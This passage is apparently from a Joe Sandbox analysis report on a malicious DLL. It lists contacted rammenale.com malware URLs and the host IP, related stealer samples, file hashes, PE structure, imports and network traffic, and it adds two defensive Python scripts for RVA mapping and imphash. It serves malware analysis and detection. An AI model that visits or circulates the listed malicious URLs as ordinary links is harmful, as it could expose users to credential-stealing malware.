https://rammenale.com/for2/aclog.txt4r | rundll32.exe, 00000005.00000002.3274732553.0000000008450000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txt49? | rundll32.exe, 00000006.00000002.3274805413.0000000008481000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmpPR | rundll32.exe, 00000009.00000002.3273671925.0000000002E80000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txt&8 | rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txtC: | rundll32.exe, 00000005.00000002.3272308201.0000000002670000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3273346372.00000000027E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3272227188.0000000002610000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3273406270.00000000027A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3272218090.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3272399936.0000000002C30000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclogtxtH | rundll32.exe, 00000006.00000002.3272073394.00000000002F7000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txt4er | rundll32.exe, 00000006.00000002.3274805413.0000000008499000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmpY | rundll32.exe, 0000000A.00000002.3274852987.0000000008D6B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmpentindowsINetCookies | rundll32.exe, 00000009.00000002.3272263359.0000000002C81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3272127824.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txtft | rundll32.exe, 00000006.00000002.3272227188.000000000261A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txtjx | rundll32.exe, 00000005.00000002.3274732553.0000000008486000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmpU | rundll32.exe, 0000000C.00000002.3275204855.0000000009207000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclogtxtB | rundll32.exe, 00000005.00000002.3272074755.0000000000247000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmpV | rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmp4e | rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txtm | rundll32.exe, 00000006.00000002.3272227188.000000000261A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txtV~ | rundll32.exe, 0000000B.00000002.3272399936.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclogtxt | rundll32.exe, 0000000B.00000002.3272070507.0000000002767000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/Si | rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://rammenale.com/for2/regit.tmpG | rundll32.exe, 00000009.00000002.3272263359.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmpH | rundll32.exe, 00000009.00000002.3272263359.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://rammenale.com/for2/aclog.txts | rundll32.exe, 00000005.00000002.3272220241.00000000023D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3272306421.0000000002C10000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmp5A | rundll32.exe, 0000000C.00000002.3275204855.00000000091F3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txtr | rundll32.exe, 0000000B.00000002.3272399936.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txtp | rundll32.exe, 00000005.00000002.3272308201.00000000026E3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmpE | rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txtWk | rundll32.exe, 00000005.00000002.3274732553.0000000008423000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmp/ | rundll32.exe, 0000000C.00000003.2370250074.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.0000000009270000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmp0 | rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmpmp | rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmp2 | rundll32.exe, 00000009.00000002.3272263359.0000000002C81000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txtz | rundll32.exe, 00000005.00000002.3274732553.0000000008450000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3274732553.0000000008469000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3274805413.0000000008499000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3274805413.0000000008481000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3274796619.000000000891D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmpR0 | rundll32.exe, 0000000A.00000002.3272127824.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmp4T | rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/aclog.txtP; | rundll32.exe, 0000000B.00000002.3274796619.00000000088D0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/for2/regit.tmp4P | rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/D | rundll32.exe, 00000009.00000002.3274905046.0000000008B02000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://rammenale.com/for2/regit.tmp4 | rundll32.exe, 0000000A.00000002.3274852987.0000000008D82000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.0000000009270000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rammenale.com/1p | rundll32.exe, 0000000C.00000003.2370250074.000000000922D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3275553692.000000000922E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.2369876959.000000000921F000.00000004.00000020.00020000.00000000.sdmp | false |
            • Avira URL Cloud: safe
            unknown
IP | Domain | Country | ASN | ASN Name | Malicious
131.153.206.231 | rammenale.com | United States | 19437 | SS-ASHUS | true
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1500782
            Start date and time:2024-08-28 22:45:04 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 36s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:15
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Dll1.dll
            Detection:MAL
            Classification:mal80.evad.winDLL@20/0@2/1
            EGA Information:
            • Successful, ratio: 50%
            HCA Information:
            • Successful, ratio: 95%
            • Number of executed functions: 21
            • Number of non-executed functions: 62
            Cookbook Comments:
            • Found application associated with file extension: .dll
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target rundll32.exe, PID 7484 because there are no executed functions
• Execution Graph export aborted for target rundll32.exe, PID 7748 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: Dll1.dll
Time | Type | Description
16:45:56 | API Interceptor | 2x Sleep call for process: rundll32.exe modified
16:45:59 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified
Context (IPs): no context
Context (Domains): no context
Context (ASN): SS-ASHUS
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SS-ASHUS | https://blockchainsolution.netlify.app/ | malicious | Unknown | 131.153.206.100
SS-ASHUS | http://blockdag-network-rectification.pages.dev/wallet/inputs.html/js/aes.js | malicious | Unknown | 131.153.206.103
SS-ASHUS | [SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.eml | malicious | Unknown | 131.153.100.38
SS-ASHUS | Bank Slip.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 131.153.147.106
SS-ASHUS | Fatura20240617.exe | malicious | FormBook | 131.153.148.82
SS-ASHUS | 0tkRwEewXq.exe | malicious | FormBook | 131.153.170.234
SS-ASHUS | CMgd5ZVG2N.elf | malicious | Unknown | 209.100.21.94
SS-ASHUS | CMV610942X6UI.exe | malicious | FormBook | 131.153.148.82
SS-ASHUS | fisher man.exe | malicious | FormBook | 131.153.170.234
SS-ASHUS | SHUYOU #U65b0#U6307#U4ee4 PO-2301010 03-07-2024.pdf.exe | malicious | FormBook | 131.153.165.35
Context (JA3 fingerprint): 37f463bf4616ecd445d4a1937da06e19
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Vidar | 131.153.206.231
37f463bf4616ecd445d4a1937da06e19 | x64_installer__v4.5.6.msi | malicious | Unknown | 131.153.206.231
37f463bf4616ecd445d4a1937da06e19 | Ad#U043ebe_Activator.exe | malicious | LummaC | 131.153.206.231
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Meduza Stealer | 131.153.206.231
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Meduza Stealer | 131.153.206.231
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Vidar | 131.153.206.231
37f463bf4616ecd445d4a1937da06e19 | 0eyaBVo6tq.msi | malicious | Unknown | 131.153.206.231
37f463bf4616ecd445d4a1937da06e19 | 2ANivMQUch.msi | malicious | Unknown | 131.153.206.231
37f463bf4616ecd445d4a1937da06e19 | NmJ4sVw68P.msi | malicious | Unknown | 131.153.206.231
37f463bf4616ecd445d4a1937da06e19 | 7Mr3U9Zd5W.msi | malicious | Unknown | 131.153.206.231
Context (dropped files): no context
            No created / dropped files found
            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
            Entropy (8bit):6.546303018854267
            TrID:
            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
            • Generic Win/DOS Executable (2004/3) 0.20%
            • DOS Executable Generic (2002/1) 0.20%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:Dll1.dll
            File size:147'968 bytes
            MD5:b14ef85a60ac71c669cc960bdf580144
            SHA1:08906644b0ef1ee6478c45a6e0dd28533a9efc29
            SHA256:861911e953e6fd0a015b3a91a7528a388a535c83f4b9a5cf7366b8209d2f00c3
            SHA512:568fd5856c2e3801d59d094429243b6e1649d3b519f8cad0feab2c6752d4158e30d305fe06a651788d7f4420d43886f5dfb4fb43da605f0a718711cb099059e9
            SSDEEP:3072:X3ri+nr4ciRGSuaHUCO25obTBhH5P1KCJN6hkf1GYn3:X3rv2RGPwUC5o3H5PVLln3
            TLSH:E8E36B06B480C072C56E29350574DA726B7FBD30DF64ADCF67980A7A9F702C1CF25A2A
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Nnx./.+./.+./.+.W.*./.+.W.*./.+.W.*./.+.W.*./.+./.+./.+...*./.+...*./.+.W.*./.+...*./.+...*./.+...*./.+...+./.+...*./.+Rich./.
            Icon Hash:7ae282899bbab082
            Entrypoint:0x100031f9
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x10000000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
            Time Stamp:0x65C48BD4 [Thu Feb 8 08:07:48 2024 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:6
            OS Version Minor:0
            File Version Major:6
            File Version Minor:0
            Subsystem Version Major:6
            Subsystem Version Minor:0
            Import Hash:2634f378ea222ed85ede1cf7f9951bae
Instruction
(Disassembly at the entrypoint, 0x100031f9. This is the MSVC C runtime's DLL entry code, not the sample's own logic: the first block compares fdwReason at [ebp+0Ch] with DLL_PROCESS_ATTACH (1) before dispatching; the two lea/sub/and/sbb stubs are the 16- and 8-byte alloca probes; the sequence push 0 / call, push [ebp+08h] / call, push C0000409h (STATUS_STACK_BUFFER_OVERRUN) / call, push eax / call matches __raise_securityfailure, i.e. SetUnhandledExceptionFilter(NULL), UnhandledExceptionFilter, GetCurrentProcess and TerminateProcess with that status; and push 17h (PF_FASTFAIL_AVAILABLE) to IsProcessorFeaturePresent followed by int 29h with ecx = 2 is __report_gsfailure raising FAST_FAIL_STACK_COOKIE_CHECK_FAILURE before it saves the register context. The sample's own code is entered through the single export mydllmain (ordinal 1) listed below.)
            push ebp
            mov ebp, esp
            cmp dword ptr [ebp+0Ch], 01h
            jne 00007F960CC3F0E7h
            call 00007F960CC3F2BBh
            push dword ptr [ebp+10h]
            push dword ptr [ebp+0Ch]
            push dword ptr [ebp+08h]
            call 00007F960CC3EF93h
            add esp, 0Ch
            pop ebp
            retn 000Ch
            int3
            int3
            int3
            int3
            push ecx
            lea ecx, dword ptr [esp+08h]
            sub ecx, eax
            and ecx, 0Fh
            add eax, ecx
            sbb ecx, ecx
            or eax, ecx
            pop ecx
            jmp 00007F960CC3F7BFh
            push ecx
            lea ecx, dword ptr [esp+08h]
            sub ecx, eax
            and ecx, 07h
            add eax, ecx
            sbb ecx, ecx
            or eax, ecx
            pop ecx
            jmp 00007F960CC3F7A9h
            push ebp
            mov ebp, esp
            push 00000000h
            call dword ptr [1001B05Ch]
            push dword ptr [ebp+08h]
            call dword ptr [1001B058h]
            push C0000409h
            call dword ptr [1001B060h]
            push eax
            call dword ptr [1001B030h]
            pop ebp
            ret
            push ebp
            mov ebp, esp
            sub esp, 00000324h
            push 00000017h
            call dword ptr [1001B064h]
            test eax, eax
            je 00007F960CC3F0E7h
            push 00000002h
            pop ecx
            int 29h
            mov dword ptr [10023B40h], eax
            mov dword ptr [10023B3Ch], ecx
            mov dword ptr [10023B38h], edx
            mov dword ptr [10023B34h], ebx
            mov dword ptr [10023B30h], esi
            mov dword ptr [10023B2Ch], edi
            mov word ptr [10023B58h], ss
            mov word ptr [10023B4Ch], cs
            mov word ptr [eax], es
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x226c0 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x22710 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x25000 | 0x1b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x26000 | 0x1334 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x21538 | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x21478 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1b000 | 0x158 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x19aeb | 0x19c00 | 2ca2786cfbd723012a4c3c12a482da85 | False | 0.584619614684466 | data | 6.670313016672894 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x1b000 | 0x7e7c | 0x8000 | ca93a188af9bf56b0a61b88270c14a95 | False | 0.460968017578125 | data | 5.309007267929745 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x23000 | 0x14b8 | 0xc00 | f2a0c098370b0401f7c1ad1213cd52fb | False | 0.15169270833333334 | data | 2.17074655225428 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25000 | 0x1b0 | 0x200 | 4cb59beff4c248d5e23bc9d579cd8ecf | False | 0.501953125 | data | 4.493775023695173 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x26000 | 0x1334 | 0x1400 | 9869f1aab016ea21d38cce363484b1c7 | False | 0.7552734375 | data | 6.441486057307813 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
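The "Is in Section" column above and the placement of the entrypoint are plain RVA-to-section lookups, and a practitioner reproduces them to catch packed or tampered images whose entrypoint or exports fall outside an executable section. The following script is an added example, not code from the Joe Sandbox report or the sample: its section table, data directory RVAs, image base, entrypoint and export address are copied from the report's tables, and the flag names are shortened forms of the IMAGE_SCN_* characteristics listed there.

```python
"""Map RVAs from a PE header dump onto the section table and sanity-check
where the code entry points land.

Added example; not code from the Joe Sandbox report. All numbers below are
copied from the report's section, data-directory and export tables.
"""
IMAGE_BASE = 0x10000000
ENTRYPOINT_VA = 0x100031f9
EXPORTS = {"mydllmain": 0x1000101b}

# (name, virtual address, virtual size, characteristics) as reported.
SECTIONS = [
    (".text",  0x1000,  0x19aeb, {"CODE", "EXECUTE", "READ"}),
    (".rdata", 0x1b000, 0x7e7c,  {"INITIALIZED_DATA", "READ"}),
    (".data",  0x23000, 0x14b8,  {"INITIALIZED_DATA", "READ", "WRITE"}),
    (".rsrc",  0x25000, 0x1b0,   {"INITIALIZED_DATA", "READ"}),
    (".reloc", 0x26000, 0x1334,  {"INITIALIZED_DATA", "DISCARDABLE", "READ"}),
]

# Non-empty data directories as reported (name -> RVA).
DIRECTORIES = {
    "EXPORT": 0x226c0, "IMPORT": 0x22710, "RESOURCE": 0x25000, "BASERELOC": 0x26000,
    "DEBUG": 0x21538, "LOAD_CONFIG": 0x21478, "IAT": 0x1b000,
}


def rva_to_section(rva, sections=SECTIONS):
    """Name of the section whose virtual range contains rva, or None."""
    for name, va, vsize, _ in sections:
        if va <= rva < va + vsize:
            return name
    return None


def directory_sections(directories=DIRECTORIES, sections=SECTIONS):
    """Reproduce the report's 'Is in Section' column."""
    return {name: rva_to_section(rva, sections) for name, rva in directories.items()}


def entry_findings(entry_va, exports=EXPORTS, image_base=IMAGE_BASE, sections=SECTIONS):
    """Flag an entrypoint or export that lies outside every section or inside a
    non-executable one; both are common tells of a packed or tampered image."""
    flags_by_name = {name: flags for name, _, _, flags in sections}
    findings = []
    for label, va in [("entrypoint", entry_va), *exports.items()]:
        section = rva_to_section(va - image_base, sections)
        if section is None:
            findings.append((label, "outside every section"))
        elif "EXECUTE" not in flags_by_name[section]:
            findings.append((label, f"in non-executable section {section}"))
    return findings


def wx_sections(sections=SECTIONS):
    """Sections mapped both writable and executable (none in this sample)."""
    return [name for name, _, _, flags in sections if {"WRITE", "EXECUTE"} <= flags]


if __name__ == "__main__":
    print(directory_sections())
    print(entry_findings(ENTRYPOINT_VA) or "entrypoint and exports land in .text")
    print(wx_sections() or "no W+X sections")
```

For this sample every directory resolves to the section the report names, and both the entrypoint (RVA 0x31f9) and mydllmain (RVA 0x101b) fall inside .text, which is consistent with an unpacked MSVC build; the same check on a UPX-style image would typically place the entrypoint in a writable stub section.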
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x25060 | 0x14e | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | English | United States | 0.6407185628742516
DLL | Import
ole32.dll | CoCreateInstance, CoUninitialize, CoInitialize
OLEAUT32.dll | VariantClear, VariantInit, SysFreeString, SysAllocString
KERNEL32.dll | FreeLibrary, WriteConsoleW, SetEndOfFile, HeapReAlloc, HeapSize, CreateFileW, FlushFileBuffers, GetStringTypeW, SetStdHandle, GetProcessHeap, ExitProcess, ExpandEnvironmentStringsW, TerminateProcess, Sleep, CloseHandle, GetProcAddress, CreateProcessW, GetModuleHandleW, CopyFileW, GetEnvironmentVariableW, LocalFree, GetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, FreeEnvironmentStringsW, RtlUnwind, RaiseException, InterlockedFlushSList, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, DecodePointer, LoadLibraryExW, ReadFile, MoveFileExW, GetModuleHandleExW, GetModuleFileNameW, SetFilePointerEx, GetConsoleMode, ReadConsoleW, GetStdHandle, GetFileType, HeapFree, HeapAlloc, LCMapStringW, WriteFile, GetConsoleOutputCP, GetFileSizeEx, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW
Name | Ordinal | Address
mydllmain | 1 | 0x1000101b
Language of compilation system | Country where language is spoken
English | United States
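The Import Hash field above is the pefile-style imphash: an MD5 over the normalised "dll.function" list in import-directory order. The script below is an added example, not code from the Joe Sandbox report or from the DLL; its import list is copied from the DLL/Import table in the order shown there. Whether that order equals the binary's import directory order (which the real digest depends on) is an assumption, so compare the computed value against the report's Import Hash rather than treating it as ground truth.

```python
"""Compute a pefile-style import hash (imphash) from an import listing.

Added example; not code from the Joe Sandbox report or the analysed DLL.
REPORTED_IMPORTS is copied from the report's DLL/Import table; the order is
assumed to match the binary's import directory (see the lead-in).
"""
import hashlib

KERNEL32 = """FreeLibrary, WriteConsoleW, SetEndOfFile, HeapReAlloc, HeapSize, CreateFileW,
FlushFileBuffers, GetStringTypeW, SetStdHandle, GetProcessHeap, ExitProcess,
ExpandEnvironmentStringsW, TerminateProcess, Sleep, CloseHandle, GetProcAddress,
CreateProcessW, GetModuleHandleW, CopyFileW, GetEnvironmentVariableW, LocalFree,
GetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess,
IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId,
GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW,
FreeEnvironmentStringsW, RtlUnwind, RaiseException, InterlockedFlushSList, SetLastError,
EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection,
InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree,
DecodePointer, LoadLibraryExW, ReadFile, MoveFileExW, GetModuleHandleExW, GetModuleFileNameW,
SetFilePointerEx, GetConsoleMode, ReadConsoleW, GetStdHandle, GetFileType, HeapFree, HeapAlloc,
LCMapStringW, WriteFile, GetConsoleOutputCP, GetFileSizeEx, FindClose, FindFirstFileExW,
FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW,
MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW"""

# (dll, [imported names or integer ordinals]) in the order the report lists them.
REPORTED_IMPORTS = [
    ("ole32.dll", ["CoCreateInstance", "CoUninitialize", "CoInitialize"]),
    ("OLEAUT32.dll", ["VariantClear", "VariantInit", "SysFreeString", "SysAllocString"]),
    ("KERNEL32.dll", [n.strip() for n in KERNEL32.split(",")]),
]


def normalize_import(dll, name=None, ordinal=None):
    """pefile's normalisation: lower-case, drop a .dll/.ocx/.sys extension,
    ordinal-only imports become 'ordN'. (pefile also maps well-known ordinals
    of ws2_32/oleaut32 back to names; that table is left out here, so
    ordinal-only imports from those two DLLs would hash differently.)"""
    dll = dll.lower()
    for ext in (".dll", ".ocx", ".sys"):
        if dll.endswith(ext):
            dll = dll[: -len(ext)]
            break
    if name is None:
        if ordinal is None:
            raise ValueError("an import needs a name or an ordinal")
        name = f"ord{ordinal}"
    return f"{dll}.{name.lower()}"


def imphash_string(imports):
    """The comma-joined string that is hashed; useful for diffing two binaries."""
    parts = []
    for dll, names in imports:
        for n in names:
            parts.append(normalize_import(dll, ordinal=n) if isinstance(n, int)
                         else normalize_import(dll, n))
    return ",".join(parts)


def imphash(imports):
    return hashlib.md5(imphash_string(imports).encode("ascii")).hexdigest()


if __name__ == "__main__":
    print(imphash(REPORTED_IMPORTS))  # compare with the report's Import Hash
```

Because the digest is order-sensitive, two builds that import the same functions in a different order get different imphashes; that is why the value is useful for clustering builds from the same toolchain and project, and why it breaks as soon as a packer rewrites the import table.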
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 28, 2024 22:45:55.143811941 CEST | 49704 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:55.143858910 CEST | 443 | 49704 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:55.143930912 CEST | 49704 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:55.145370960 CEST | 49705 | 443 | 192.168.2.5 | 131.153.206.231
Aug 28, 2024 22:45:55.145418882 CEST | 443 | 49705 | 131.153.206.231 | 192.168.2.5
Aug 28, 2024 22:45:55.145484924 CEST | 49705 | 443 | 192.168.2.5 | 131.153.206.231
